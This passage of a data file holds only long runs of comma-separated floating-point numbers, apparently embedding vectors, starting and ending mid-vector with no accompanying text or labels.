.009622787,0.010478142,0.008250509,0.015854562,-0.011800139,-0.037893064,-0.029956564,0.007137825,-0.0049861735,-0.016214276,-0.0038064027,0.016403453,0.0043879836,0.023889782,0.009433584,-0.007462954,0.0068410113,-0.008957387,-0.017712139,0.017023826,0.008730945,-0.0013787478,0.007427489,0.012826217,-0.01276075,0.016069263,0.0043132864,0.007906115,-0.0061460906,-0.022360135,-0.021463195,0.002098903,-0.029230442,-0.007579981,-0.007870037,0.00025020138,-0.009119446,0.034510072,0.02275048,-0.020398486,0.013123256,-0.012321694,-0.0014082331,-0.020526933,0.010257833,0.0132448645,-0.011852424,0.024580773,0.030048545,-0.020054698,0.008438328,-0.0011956152,-0.02127047,-0.03407573,-0.010224144,0.011156384,-0.036887217,0.0013818822,-0.016948985,-0.02883817,0.014474376,0.0071782866,-0.009831699,-0.0013733631,-0.017534837,0.0027682774,0.010964165,-0.015041169,-0.0053095743,0.016596932,0.020977382,-0.028690303,-0.0071737748,0.0049605514,-0.012124689,0.0056741396,-0.0068793907,0.020370064,-0.012923082,-0.031835075,-0.03746412,0.004045068,0.018564347,-0.035105634,0.0018152075,0.03238341,0.037227396,-0.011627708,-0.00861233,-0.016303636,0.021303387,-0.005566005,-0.0032579245,0.0028530685,0.03347905,-0.02305029,0.04083023,-0.014143781,-0.020278163,0.005008151,-0.015804235,0.0069069774,-0.002434752,-0.014226337,0.00068851345,0.010669449,0.009008956,0.0035142577,0.0104665905,0.011351304,0.006977382,0.009452895,-0.0074207094,0.001443388,0.004743772,-0.00035153067,-0.0035304222,0.004414136,-0.018446665,-0.011304339,-0.0028885186,0.0014268007,-0.0039412105,0.008463824,-0.014152103,-0.01713745,-0.0068612155,0.00556069,0.011512442,0.006766973,0.028600484,0.015367922,0.013590971,0.000061234176,-0.014603417,-0.0006740424,0.023882672,-0.0019110308,-0.008662951,-0.025419176,-0.026617695,-0.0041556573,0.02249019,0.016842118,0.00069045706,-0.005101356,0.0075698835,-0.033240713,0.0066932924,0.01813437,0.0055008284,-0.032136224,0.03158613,-0.011302749,0.004853677,0.006958078,-0.0015380553,-0.004864887,-0.01153334,-0.01072976,0.007961024,-0.014836132,0.0115666855,-0.017222907,0.04211614,-0.013468851,-0.006700356,-0.019600943,-0.0056876778,-0.0152692655,0.0003728172,0.019943988,0.011508782,-0.0045751682,-0.04980323,-0.01685462,0.010483345,-0.025900373,0.0115457475,-0.008458848,-0.009476221,0.004712931,0.00871235,0.012579884,0.010586325,-0.0089970725,-0.006644656,-0.00798921,-0.015369039,0.02901139,0.008042011,0.013886756,-0.0045466023,-0.0060496824,0.0060445773,-0.009898427,-0.011343013,0.021608818,0.008056571,0.013898516,0.00089520105,-0.008700841,-0.0055736485,-0.004351119,0.014387383,-0.032545283,0.07659551,0.000087877284,-0.0030125766,0.0053141415,-0.004602669,0.0026659935,0.014812667,-0.016932381,0.040180515,0.021049768,-0.0035883058,-0.0059206593,-0.012288932,0.008876275,-0.0035336944,0.025861323,0.010692617,-0.004530574,0.011765456,-0.0040643765,-0.020379405,0.013880766,-0.0003363942,-0.02092637,0.012202255,-0.01097226,-0.00038115712,-0.0084330235,-0.0050057354,0.002472954,0.0044623422,-0.023344912,0.0012889841,-0.005931444,0.040438436,-0.017560726,-0.014090654,0.009762868,-0.00027750092,-0.025027046,0.047700554,0.004248197,0.004830176,-0.0074312403,-0.0022510043,-0.007906461,0.07808675,0.03220117,0.015499673,-0.015266374,-0.008896441,0.031063404,-0.020610362,0.020526698,0.014270412,0.013281194,-0.0028999115,0.016737789,-0.01199777,0.014638967,0.0021937739,-0.006629417,-0.0019391566,0.008835302,0.015898261,-0.017421737,-0.004540372,0.0004591275,0.024644028,-0.014708557,-0.01132802,0.016580397,0.013614699,-0.008124229,0.02516201,-0.0093818,-0.00027140861,0.005077939,0.008863054,0.03520456,0.005778486,-0.047388796,0.011100632,0.11130759,0.006877189,0.011737773,0.0050717485,-0.0033786625,0.012236102,-0.009103391,-0.024291255,-0.018526236,-0.024645632,-0.011214125,-0.04407102,-0.028709915,0.02251055,0.021999223,0.0015805403,0.009804195,-0.0288778,0.0005550406,-0.023627812,0.013136462,0.0055179135,0.006226187,-0.004778002,-0.03115856,0.0052494975,0.019918196,-0.0103094485,-0.022482473,0.013126307,0.0006111806,0.004603791,0.011363451,-0.00080863456,-0.013954761,0.011055006,-0.0068550576,0.008741495,0.016011592,-0.023753516,0.006817031,0.016787682,-0.010787181,-0.036208898,-0.11407326,0.0045198305,0.00691471,-0.023457551,0.015441998,0.015705094,0.0027475636,-0.01534612,0.007747216,-0.03343833,0.003845002,-0.0027375296,-0.0048085805,0.0048738886,-0.019897489,-0.001346887,-0.028392095,0.00527773,0.0006887536,0.005659739,0.008772465,0.009697648,-0.009976597,-0.007609664,-0.007482688,-0.0076622367,-0.009214607,0.021921143,-0.0063645802,0.021370552,-0.030765928,0.00398178,-0.009991793,0.0012368099,-0.018366767,-0.0052114287,-0.039312545,0.0062653967,-0.013951818,-0.005125213,0.010369238,-0.011017596,0.0018147149,-0.004589233,-0.0056113256,0.019531481,0.0014318664,0.012257599,0.0017372532,0.0125643965,0.05580466,-0.0061902762,-0.020847179,0.013512343,-0.02560102,-0.0052140392,-0.009891359,-0.018256685,-0.021847673,0.0058433623,-0.0028684824,-0.014127833,-0.015394003,-0.016091984,0.019614197,-0.015289801,0.0139698405,-0.032313786,0.0062597096,-0.0077151074,-0.010300173,-0.0065190946,0.008534416,-0.04426173,0.01697179,0.01534445,-0.015927792,0.0107006645,0.013654381,-0.017520437,-0.020100104,-0.00043257687,0.012408438,-0.025054967,-0.018759677,-0.00766495,-0.014903953,-0.0036211978,0.000012473315,-0.015443725,0.02028694,0.015118446,0.028069021,0.0009327577,-0.0159892,0.022601204,0.01373004,0.018555235,-0.016286751,0.015484062,0.009110441,-0.02865637,-0.009884352,0.016559219,-0.013100123,0.014242036,-0.011972404,-0.0238993,-0.021846654,0.0012783661,0.005172687,0.015127779,-0.006476167,-0.027319806,-0.021171559,-0.024393475,0.013386386,0.0032549233,0.0101362625,-0.015701633,-0.015611902,-0.019415261,0.0046516918,0.013088043,0.029446857,0.0006896166,-0.024141043,-0.008446566,0.008872415,-0.035453826,-0.0131026,0.003414677,-0.006870523,-0.0021469593,-0.005177561,0.00806346,-0.019793544,-0.0021959662,-0.035109468,-0.0040017655,-0.0005418239,-0.026131334,-0.01189582,-0.02752145,0.033599827,0.0075027556,0.037374172,-0.015561329,0.015040728,0.00094757864,0.0036063334,0.02649945,-0.01618927,-0.016409826,-0.0060103484,0.068171285,-0.00069903705,-0.001029005,0.023567809,-0.0055030244,0.012127912,0.010033688,-0.017788127,-0.012875544,-0.010790598,-0.043318965,0.0016875825,-0.01248173,-0.006823287,-0.005524103,0.017591873,-0.017962188,0.02653647,-0.004903058,-0.004997974,0.0078660725,-0.033749063,-0.004385201,0.046131037,0.028051121,-0.017506061,0.019348243,0.0031371939,-0.009637198,0.0071880696,-0.001792953,0.00037860253,0.0044373935,-0.0023707647,-0.0016054483,-0.044813387,-0.014497862,0.009596235,-0.0015936733,0.0007203385,0.008181194,0.0032125511,0.025667269,-0.023359962,0.017818859,0.016589388,-0.037649896,0.0058378945,-0.012590697,0.00013388785,-0.0048574023,0.019528858,0.00921566,-0.03735615,-0.00013978833,-0.014478605,0.0050465097,-0.0021864646,-0.00460151,-0.0013556811,0.0039625545,-0.02095865,0.002406128,-0.0039974083,0.0038782172,0.0118797915,0.012987093,0.017366756,0.0051340545,0.0141006475,-0.024497868,-0.0000132347595,0.008410749,0.018026201,0.0016890168,-0.0058650584,-0.014989326,0.00006437557,-0.00486443,0.0054999944,0.010630377,0.006735022,0.021353677,-0.0016900394,-0.028267514,-0.06438103,0.00078783045,-0.0027547914,-0.031885374,0.032420203,0.0048191873,0.003415279,0.032996427,0.0008117177,-0.003228766,-0.011092933,-0.006188807,0.017727783,0.0139456475,-0.0033578763,0.023107462,0.02482237,-0.0059348037,-0.01228452,-0.016949683,-0.006336752,0.0015428916,-0.037319582,-0.011748873,-0.028185703,-0.0015475559,-0.011453116,0.011866565,-0.02008552,0.0059665916,0.064814724,-0.023171991,0.0013828072,0.018540824,-0.015475587,-0.012404271,-0.0046313144,0.0098034525,-0.023519859,0.054831564,0.0026774092,0.0013263917,0.008508989,-0.008690945,0.02571118,-0.0200073,0.052421305,-0.0035956213,0.008503832,0.004245572,-0.011305663,0.020934874,0.004197656,0.015533449,0.02417903,-0.032616682,0.030139334,-0.010855382,0.0054359487,-0.007153197,0.006076249,0.024135808,0.0032821647,-0.025869127,0.014668909,-0.022797927,-0.016477352,0.001771188,0.0046819276,-0.007703155,0.01871926,-0.022391582,-0.006319403,0.0083615165,-0.006491347,-0.025787253,0.017106937,0.0012929533,-0.022915855,-0.014193689,0.016778259,0.023668487,-0.01685383,0.00877033,0.000998559,-0.004612164,-0.025150158,0.024402527,0.005438006,-0.002852656,0.03149863,-0.009550893,-0.0057466086,-0.03227278,0.0076222243,0.017750893,0.024208734,-0.026486475,-0.0027289146,0.02550731,0.007459596,-0.0060207243,0.024020476,-0.012140304,0.0027386502,0.0055031297,-0.0060052588,0.0050143576,-0.018385509,-0.01404814,0.0044543887,0.004988237,-0.036403537,0.0042203018,0.02914436,0.00045897593,0.02351008,-0.011510816,-0.036714412,0.0028234029,-0.0067977477,-0.019446136,0.0020218964,-0.016880743,0.009336775,-0.005755502,0.004217318,-0.005060921,-0.013649614,0.0039678966,-0.011887622,-0.004292085,0.008092831,-0.013495762,-0.03890315,0.008637124,-0.006294588,0.014138313,-0.0062604053,-0.012406044,-0.012022108,-0.024617027,0.107747465,0.0010531582,-0.013032281,0.0069501987,0.041954633,0.009935144,-0.009332759,0.012783111,-0.030615311,-0.0015388085,-0.00027960798,-0.026675122,0.010498633,0.004047312,0.0021549861,-0.034122,0.020868894,-0.006302212,-0.0077762827,0.011239868,-0.017521203,0.0009789275,0.0037140942,-0.0010830231,-0.021440858,-0.026017902,-0.009047595,0.009893701,-0.016034828,0.008239066,0.000880046,-0.008218267,0.0061076833,-0.002568683,-0.022001464,-0.0045038974,0.02386827,0.015478229,-0.012909642,0.017751034,0.013347976,0.003628248,-0.00024313743,-0.012248324,-0.010504353,-0.0021507011,0.015724244,-0.02279194,-0.0029673192,0.018595181,-0.0074499813,0.03014613,0.0056068855,0.007138578,-0.0033587804,0.022811411,-0.011775493,-0.009777313,0.000728651,0.003781065,-0.0082843285,-0.0058006863,-0.0051495144,-0.013059468,0.013432618,0.021072838,-0.010587852,-0.0066023176,-0.013018621,-0.012551674,-0.013166957,0.034928,0.0073354314,0.007939343,-0.004389039,-0.018051157,0.003978506,-0.01320073,0.006381336,0.0028353774,-0.008342182,0.012487557,-0.018120691,-0.010004928,0.009509034,0.0031256217,-0.015772723,-0.011925283,-0.0110240495,-0.009219566,0.024612127,0.022812117,-0.018629437,0.0005599161,-0.006654178,0.0123314215,0.0017286799,0.014391324,0.0061867507,-0.030322969,0.006612993,-0.0038331496,0.014210923,0.012485704,-0.011394004,0.0034789024,-0.01620365,0.007108137,-0.00249828,-0.028757272,-0.0043464745,-0.0056007644,0.024059843,0.08445337,-0.001743026,-0.038105503,0.0028131602,0.02356226,0.00752004,-0.009894878,-0.0059984056,-0.0067980615,-0.0058924593,-0.01586247,0.011854143,0.012732196,0.008156379,0.015527436,0.018649437,-0.0062214574,-0.010267088,0.02513464,0.0023553441,0.014512747,-0.019985067,0.011124014,-0.010910867,0.00023211514,0.0012398165,0.031019365,-0.008349051,0.025557587,0.0022666308,0.0055710273,-0.012483807,-0.014525261,0.009151026,-0.0041584987,-0.003306247,0.029235233,0.010963143,0.002254301,0.004198329,-0.0008143038,0.00878174,0.00028895235,-0.0008650185,-0.002697167,0.030295312,0.0013822287,-0.010298166,-0.0017145703,-0.02889005,0.042488992,0.023063218,-0.0036009408,-0.0046937373,-0.004659193,0.006517757,-0.003967756,-0.0025655145,0.005702057,0.010483999,-0.018491445,-0.029095871,0.0018030877,0.0011844464,0.010217068,-0.008512001,-0.010259372,-0.015052606,0.0040964237,0.022038482,0.00740175,0.003210347,0.024222124,-0.032030847,-0.010146714,-0.009367635,0.009049376,0.0051349886,0.01038687,-0.010291008,0.0048156264,-0.023313994,-0.009742884,0.016558293,0.0048284526,-0.0015780356,-0.028379533,-0.014016215,0.0010049219,-0.015407255,0.02450096,0.00032175702,0.009098971,0.0011564827,0.0060058758,-0.012700018,-0.005139306,-0.027700564,0.006583195,0.036695685,-0.0002888037,-0.008657527,-0.009072897,0.0058515114,-0.0024420877,0.025706587,0.00948181,-0.004571281,0.0036517435,-0.0031436062,-0.004143208,-0.0073104445,0.03593086,-0.040811453,0.0011479517,-0.008659636,-0.005879523,-0.0129209375,0.0028636265,-0.03574009,0.00012049603,0.005563693,-0.011425546,-0.0018905953,0.028205568,0.02270722,-0.032456603,-0.0074443123,0.0012640312,-0.010352525,-0.0024906716,-0.002973359,-0.023019709,-0.0013615612,-0.013166664,0.00799058,-0.0032413215,0.018590912,-0.0115473755,0.0036365693,0.003534712,0.004699044,0.016382797,0.0033420492,0.014891699,0.006097687,0.003262786,-0.00956582,0.007597139,-0.004359786,0.0032525312,-0.013057168,-0.031458426,-0.0056399214,-0.003423637,0.0042035067,0.022828769,-0.008582799,0.013196443,-0.004782617,0.023464914,0.0048801997,0.015266726,-0.008740448,-0.00498424,0.026446272,-0.0061456384,-0.026929362,0.011048283,0.008784325,-0.024654228,0.024611557,0.013558338,-0.010329071,0.011230135,0.03035024,-0.0036326991,-0.010344679,-0.007981768,-0.015892016,0.023707546,-0.0123227835,-0.015305953,0.019204723,0.016617168,-0.001632225,0.0144238975,-0.0014984017,0.025626387,-0.022120375,-0.009222643,0.02561062,0.018958956,0.024872864,-0.009372365,0.0039866464,0.0002353635,-0.030349713,0.0070826774,-0.0030901185,-0.00016122106,-0.028794609,0.005302458,-0.000028701794,-0.020168254,-0.0058757123,0.008031304,0.021863006,0.008207797,-0.034650367,0.004804145,-0.0057986807,-0.00025322853,-0.0057558455,-0.0069216467,-0.015222753,0.0038098134,-0.0015725412,0.028911997,0.006352134,-0.0046845716,-0.018687425,0.0019294985,-0.01667873,0.010939042,0.0061704353,-0.0044139344,0.0050364262,-0.0023013763,0.011788428,-0.036955565,-0.009172553,0.0069985837,0.002289298,-0.0090298485,0.001278576,0.01649196,0.0010449921,-0.017378079,0.0112007335,-0.016281059,0.0043354235,-0.021046482,-0.013379922,0.0004101916,-0.023033567,0.0011326151,-0.006747466,0.0059392573,0.011105394,0.02177789,-0.03111507,0.016687764,-0.030583309,0.016278846,-0.013945928,-0.019628368,-0.01174593,0.011767538,-0.00088993984,0.00069316674,0.011442742,-0.0016381422,0.017376235,0.0009510195,0.016019836,0.0057737315,-0.001858955,-0.012098206,-0.00096026936,-0.02607477,0.0038013745,0.017812401,0.03958006,0.01511797,0.009108604,0.02349282,0.016066918,0.002833625,-0.004001147,0.0017822151,0.028297745,-0.0025547005,-0.016159613,0.02022553,-0.004771571,-0.00027495535,0.025139796,0.0021268742,-0.021757757,-0.013839423,0.022403516,0.01187751,0.0012552962,-0.009595499,0.009638461,-0.01858192,0.0061381035,0.024602855,0.0054391045,-0.013362606,0.009063348,0.014777845,0.0024420207,0.017706381,0.02294178,0.00055343896,-0.002937556,0.0017408582,0.00557679,-0.008349503,0.022426698,0.026114486,-0.007647297,-0.032048743,0.04289243,0.028879212,-0.0102274865,-0.0026548335,0.013249473,0.0055277273,0.007834963,0.042700395,0.01122265,0.009209517,-0.025959292,-0.021106752,-0.0016150174,0.015899353,-0.0076636565,0.0131315645,0.005163027,0.015558462,0.028662547,-0.024891933,-0.02035353,-0.011374078,0.001075392,0.032878675,0.013264579,-0.00094411726,-0.006333751,-0.005572152,0.011655383,-0.0026141533,-0.012328281,0.015753133,0.012141887,-0.0025949075,-0.0082460195,-0.00010692576,-0.016500289,0.0080179535,0.014228864,0.013236807,0.004869098,0.004463947,-0.0039390586,-0.011122201,-0.012819627,0.021881644,-0.006388878,-0.0069440333,-0.003629274,-0.03182146,0.0025205687,-0.00010833222,-0.012529391,-0.0079043,-0.0005047056,0.027467977,0.046016883,-0.0048671314,-0.01992167,0.010741155,-0.008666361,-0.019601254,-0.013668967,-0.023173539,-0.0011060439,0.0055534346,-0.007428106,-0.019564344,-0.0077438094,-0.0146141695,-0.01257694,0.00071742065,0.024842195,-0.005840089,0.0011840767,-0.009531435,-0.023528544,0.015558233,0.027656233,-0.0052596647,0.016368797,0.0069415653,0.006309155,-0.009426409,-0.008226601,0.017747259,0.0021250022,-0.030346101,-0.012510922,0.0046963296,-0.007802349,-0.0060212775,0.007520759,0.01658068,-0.024070716,0.014579282,0.02117963,-0.0022474558,-0.0059352643,0.008968063,-0.0057384586,-0.017181637,-0.0025674922,-0.024895595,0.026589364,0.0021213908,0.024113536,0.01442863,0.011701156,0.0024081687,-0.00998681,0.003594789,0.017663736,0.14352734,-0.015492211,-0.014630931,0.022803346,-0.00942238,-0.00047532798,0.024359522,0.019501492,0.015919438,0.01732053,0.011156519,0.021098875,-0.013809771,-0.029353455,0.0007957182,-0.000734869,-0.0018292913,0.036028307,0.0032916064,-0.005273615,-0.008715173,0.009221088,0.012660573,0.008947184,0.0018721665,-0.008750764,0.0030410402,0.006434771,0.017090593,-0.03150447,-0.0054993797,-0.019406091,0.015530916,-0.00060778606,-0.020034375,0.0046359696,0.014587511,-0.0092312535,0.016015619,-0.0009671552,0.00999418,-0.021330545,-0.0065389993,-0.01998127,-0.067698896,0.0035792277,-0.0012777494,-0.005124921,0.02583123,0.0010586951,-0.007448131,0.0068629296,0.00020099054,0.00974163,-0.016004384,-0.005322584,0.011007527,0.019951543,0.016931262,-0.0034828312,0.0010344806,-0.014587781,0.023814721,0.0081690075,-0.008050796,0.025742738,-0.0037693272,0.0045973435,-0.008140503,-0.012284948,-0.005427127,0.005076099,-0.014369659,0.020807767,0.013777981,0.009367269,0.013264284,-0.021600742,0.0017265292,0.010846376,0.004450823,0.012798819,0.010218833,-0.03429961,-0.01457004,-0.006286507,0.018695155,-0.008226753,-0.006175043,0.04023565,-0.02756227,-0.0090167625,-0.017377527,-0.013784304,0.0007884036,0.034328625,-0.0079910625,0.01625407,0.024641076,-0.0050328616,0.009394962,-0.0050935317,0.022837188,0.0009868747,-0.013021093,-0.0038785934,0.024003396,-0.014117942,-0.0035786163,0.02390296,0.00045891354,0.0105914995,-0.011550806,0.006619109,-0.00039548572,-0.013608915,-0.006928315,0.0074615306,-0.014007989,0.024082616,0.0022850966,-0.002360231,0.015765576,0.013127065,-0.0024326937,0.009252158,-0.00040903012,-0.0038284746,-0.005875596,0.020322423,0.009772073,0.01738357,0.032793805,-0.0024082535,0.01134147,-0.01308219,0.026002437,-0.011710502,-0.012277955,0.022988655,-0.0070522106,-0.008826501,0.008033492,0.01344314,-0.004536368,-0.0073193843,0.017290354,-0.0152138,0.00071369816,-0.008495558,-0.002705097,0.014736917,-0.0018153113,0.013816384,0.009717359,0.009283779,0.007562412,0.009614251,0.020885509,0.013212052,-0.0049816878,0.026078835,-0.0031278543,-0.017981905,-0.020763043,-0.01754205,0.0024038816,0.021688245,0.0129785985,0.003228673,-0.01974091,-0.016432751,-0.024811357,-0.005988756,-0.026295194,0.028070197,0.034926396,0.008249787,0.0038177914,0.026454948,0.027999328,0.017973615,-0.0104760025,0.013456589,0.0063947844,-0.021704618,0.0011977333,0.0049050376,-0.0038997605,0.029145652,-0.011863456,0.005306502,-0.011255455,-0.017066147,0.003907774,0.008967819,0.005153082,-0.0020875933,-0.0015132879,0.005277153,0.022476139,0.006919179,0.009794367,-0.0058059376,-0.005856225,0.02882195,-0.0023734877,0.014624604,-0.025602529,-0.0017050138,-0.0034322937,0.0031749855,-0.0261617,-0.014919753,-0.010955145,0.0006766488,-0.01319488,-0.002924159,-0.011658976,-0.005792319,0.013932825,0.002036359,-0.013516242,-0.014869658,-0.032391924,0.005098138,-0.000178384,0.016928913,-0.01647956,0.008399204,-0.004920751,-0.0025531526,-0.0075452053,-0.031355675,-0.0063818083,0.0006652261,0.002863189,0.026482802,-0.02955085,-0.019944953,-0.0043581277,0.012303194,-0.027383162,0.0115295425,-0.015948305,0.02393517,-0.0072544417,0.007041812,0.024546858,0.026876992,0.0058879424,0.0004769472,0.011131423,0.0098143555,0.011845108,0.01581567,0.0027007593,0.08080558,0.015794946,-0.023143433,-0.006230398,-0.009089671,0.0067896415,0.040112723,0.023609512,0.0034399834,0.021845087,-0.0023975903,-0.014890778,0.01553863,0.0028130221,-0.013823602,0.0133965975,0.026630567,-0.008506253,0.018745033,-0.017281724,0.007528546,-0.033161998,-0.0027109422,0.016985515,0.027309822,-0.059996687,0.0115046045,0.047874805,-0.013716486,0.017528748,0.019518055,0.01670268,0.036855947,-0.00326551,-0.017724572,0.0049921973,0.002883838,-0.0059092026,-0.004988084,-0.022852711,0.0043475535,0.027678628,0.0019799664,-0.016838329,-0.036602493,-0.0003397457,0.003252161,-0.0058268816,0.0010863227,-0.024877487,0.012547779,0.01715665,0.0023931793,-0.00013474535,0.018476317,-0.0035831097,0.00090531725,-0.0053772116,0.02338709,-0.021895172,0.025189707,-0.008371586,-0.0026399798,0.025079427,0.007657575,-0.0002749965,-0.007712089,-0.0054279086,-0.03105561,-0.029705675,0.048225056,-0.020385377,0.014237266,-0.0054088966,0.0069530513,0.014412383,-0.009781804,-0.035519935,-0.02451813,-0.007152846,0.02061145,0.012118379,0.038343508,-0.012139106,0.03313112,-0.004305472,0.007843515,0.0038087948,-0.006272909,-0.004482327,0.01331295,0.014980663,0.0032165663,0.011177389,-0.021659223,-0.018720197,0.023594452,-0.019367144,-0.012579269,0.020426182,0.0042917184,-0.018119344,-0.006427723,-0.018196283,-0.023007108,-0.018580321,0.01324436,0.011776368,0.0109881135,0.00874456,-0.009756622,0.008709499,-0.00032117928,0.0015819338,0.013029249,0.012029406,-0.0028944486,-0.028721761,0.021697901,-0.013940855,-0.011280932,0.006436629,0.021952925,0.03516472,-0.0066397013,0.018856674,-0.015635684,-0.007910662,0.0011277904,-0.004197831,0.009743744,-0.038713783,0.0040956386,0.008047059,0.0019783024,0.016660614,0.024418687,-0.0068621924,0.0044245934,-0.0017040104,-0.0010568324,-0.012210336,-0.008912913,-0.002731432,0.0025510858,-0.009811544,0.012207523,-0.012594868,-0.0029968945,0.0048435978,-0.015851261,0.009345473,-0.0014367067,0.0012336799,-0.03138558,-0.01552416,0.017605782,0.0063980366,-0.009066058,-0.006670183,0.006439071,-0.010102482,0.0022615287,-0.037292752,0.0070311017,0.021944204,0.007789574,-0.011367626,0.005054345,0.0026652287,-0.0039424226,-0.003942126,0.002124453,0.023261232,-0.006328966,0.0010080859,0.011497294,0.0038185383,-0.014984807,0.0015729048,0.010437081,0.019586137,-0.011354573,0.020474294,-0.0056950897,-0.027254704,0.0072647943,0.011977616,0.0021030118,0.01345826,-0.008895524,0.01937589,0.006351123,0.0063455054,0.010789695,0.019515768,-0.033959344,0.028176248,-0.017201323,-0.044382434,-0.0150331855,0.003758294,0.0072951186,-0.02652238,0.0033844085,0.0023501567,0.0024460924,-0.027755093,-0.007181895,0.009330497,0.0020363105,0.0053150128,-0.011349281,-0.007019859,-0.016718823,0.015820708,-0.021936215,-0.009901151,-0.01981042,0.002659269,0.014876687,-0.02546828,-0.012744258,-0.0035990546,0.0023545753,-0.02260262,-0.023050431,0.021069568,0.008680089,-0.019139603,0.009790987,-0.007485916,-0.014984187,-0.005999131,-0.0069438634,0.018244766,0.023166383,0.012285789,-0.008872764,0.01685256,0.008041097,-0.018635275,-0.010216867,-0.008234085,-0.013538451,-0.0067100246,0.016875084,-0.013837149,-0.0124065,-0.024350533,-0.004068388,0.0116152195,-0.023381516,-0.009959067,-0.027251225,0.00027980324,0.011928033,0.0113272555,-0.0168879,-0.019781595,0.000042375115,-0.00912416,0.008006487,0.022349017,0.005396831,-0.014212932,0.012912091,-0.030049944,-0.02140876,-0.007276173,-0.019061107,-0.02194304,-0.01186837,0.0028586932,-0.024466971,0.0065912525,-0.0065719383,-0.01025538,-0.011469783,0.016965307,0.008452385,-0.016111398,0.01701878,-0.01969946,-0.0011135783,-0.020752039,0.019703506,0.01432161,0.045799132,-0.08065317,-0.00076301495,0.027733784,-0.001956322,-0.0070462157,0.022372348,-0.0055965064,-0.05590452,-0.029644886,0.037180908,0.006460625,-0.004778595,-0.033564966,0.009328516,-0.0022852067,-0.00968292,-0.0069185174,0.008952613,0.013207062,0.00008870846,0.032807592,-0.005471334,-0.0023142272,0.0069551994,-0.016432289,-0.0096501615,-0.0118855685,0.007737902,0.008187685,-0.012642514,0.01771458,0.027292436,-0.014305191,-0.004957341,-0.010263548,-0.007814766,-0.008760675,0.00617044,-0.011375304,-0.043098547,-0.018645568,0.016571427,-0.0051729335,0.00059624936,-0.012093336,-0.010201577,0.01189385,0.004648441,0.14492348,0.017572671,-0.008782843,-0.018129097,-0.0029917988,-0.010549357,-0.0062437565,0.016235793,-0.012104067,0.0072584418,-0.0113814445,-0.008346204,0.01139117,0.01425964,0.0048772236,0.005273963,0.016310489,0.16015126,0.0112925805,0.02322613,0.012139628,-0.0058284225,0.028620813,0.0076951995,0.006162173,0.038366042,-0.0061399657,-0.022283973,0.013781458,-0.0038343258,0.008414805,-0.000010808162,0.014997409,-0.010464049,-0.0074082953,0.007365993,0.0057536094,0.0037819417,-0.014796762,-0.009081904,0.01944504,-0.033805937,-0.00006499248,-0.0032325916,0.0075283158,0.0143157635,-0.0073339334,-0.0077024153,-0.01512697,0.015186792,0.0035879442,-0.006383646,0.0054795197,-0.005081152,-0.007124916,-0.0015756456,0.0009252922,0.0022473591,-0.023758272,0.017626304,0.006324771,0.009248858,-0.011926484,-0.0013993314,-0.02845521,0.007591596,0.0035061575,0.015551547,-0.018142844,0.0049010227,-0.016194258,0.01956712,-0.018091325,0.010036195,0.0046616695,-0.0051777284,-0.00050026504,0.0048724418,0.011479057,-0.01658849,0.008210369,0.024143627,-0.025611574,0.008032078,0.015427706,0.021308118,0.010507074,0.012807758,0.020617919,0.0066685015,-0.0100303935,-0.0044152406,-0.00109341,0.014058239,-0.011071516,0.020429177,-0.0061976784,-0.01292605,-0.018039607,-0.013993444,-0.035558295,0.016013123,0.024124615,0.03532265,-0.014080262,0.019828258,-0.0055239447,-0.0012595444,-0.008048579,0.0059755957,0.015393891,0.023064839,0.0054441085,0.0037730031,-0.014731992,-0.00019572848,0.010573499,-0.001893628,-0.017132314,0.005733395,-0.0007410763,-0.0045006773,0.020908894,0.010011254,-0.017791199,-0.003190883,0.013128613,0.0038496512,-0.026171373,-0.008206496,-0.0017952017,-0.00445925,0.01733098,0.021141838,-0.0077188835,-0.03248646,-0.011660247,-0.03657932,-0.014941699,0.007665042,0.012500777,0.027068479,0.0042329174,-0.016826862,-0.017003136,0.0027569293,0.00025224063,-0.0033936678],[0.0020017722,-0.0099477125,-0.007923411,0.00057586184,0.010395324,0.0067915004,0.0043958607,0.005166663,0.012045703,0.0013172452,-0.0021751442,0.009297682,-0.023735175,0.016151942,-0.0075070136,-0.006108583,0.013943744,0.004445145,0.020376258,-0.012781548,0.009618544,-0.00045087,0.039625816,0.011670219,0.007884859,0.026674582,0.007936426,-0.0076681487,0.02762961,-0.009372916,0.02056602,0.015112195,0.00874996,0.008949156,0.020792749,0.016577888,-0.0088531105,0.011114699,0.012683005,-0.021618858,-0.0017473586,0.0060829925,-0.0060088662,0.006926331,-0.00056945207,-0.007587866,-0.01066993,-0.03523612,-0.009316063,0.010798817,-0.007315544,0.013119141,0.0013293334,-0.0007137769,-0.00059532543,-0.0034187734,-0.013724396,-0.02689802,0.016099991,0.006949331,-0.013548241,0.0071388623,-0.016905883,0.002476895,0.025927296,-0.0016337084,0.002391317,0.0017595583,-0.01427529,-0.0045104544,0.037271507,0.008544256,0.012616911,-0.004591571,-0.013789846,0.010856161,-0.0017914745,-0.0042751865,0.008752329,-0.016978836,-0.024863211,-0.0077449763,0.0093788365,-0.015792942,0.0047106957,-0.005894672,0.0053692437,-0.013121785,-0.0018281955,-0.0058539878,0.010250183,0.009270375,-0.020443292,0.017656693,-0.012449437,0.002546391,0.006699383,0.007908325,0.004234433,-0.016437424,0.014169778,-0.010092264,-0.024469294,0.0041656364,0.0033445938,-0.015427217,0.006782229,0.021421833,0.010553325,0.023714961,-0.0038672823,0.00787809,0.009551637,-0.01587114,-0.011002261,0.003011989,-0.004843682,0.019351821,-0.016356379,0.0021372298,-0.005701262,-0.008150963,0.010823296,-0.009016863,-0.01718721,-0.007369713,-0.02914576,-0.0075865984,-0.012891609,-0.013332162,-0.0056808083,0.027298883,-0.016939286,-0.0024939221,0.007188954,-0.008436193,0.010376408,-0.0012110675,0.00787029,-0.014829185,0.027551878,0.0036853508,0.016045494,0.020154687,0.016496696,-0.0014551732,0.021390298,0.011523759,0.022378717,-0.009427133,0.019932903,0.007175456,-0.017329087,-0.0023654765,0.0046360623,0.0026613213,-0.022528369,0.00019972875,-0.000687582,0.014939933,0.009507515,-0.008632455,-0.012224302,0.048806343,0.0059961155,0.010785665,-0.020380681,0.006271797,0.0007643937,0.0010685947,-0.0038143755,0.018602144,0.0028645503,-0.0060195304,0.0066656605,-0.028762888,0.0017714809,-0.012459723,0.008778766,0.018506737,-0.004624272,0.013063419,0.005343976,-0.027939605,0.019659601,0.016811501,0.0013417358,0.01800023,-0.0014089445,0.0008436668,0.0025310717,-0.00008910821,-0.0040813717,0.0046466794,-0.02147777,-0.024901196,0.0057605086,0.104554854,-0.013446195,-0.013275179,-0.005980606,-0.013469035,-0.00844271,-0.040255234,-0.0025913583,-0.0052365107,-0.0037567017,0.006588574,0.0050207563,-0.022048384,0.02256841,-0.007954518,0.00202907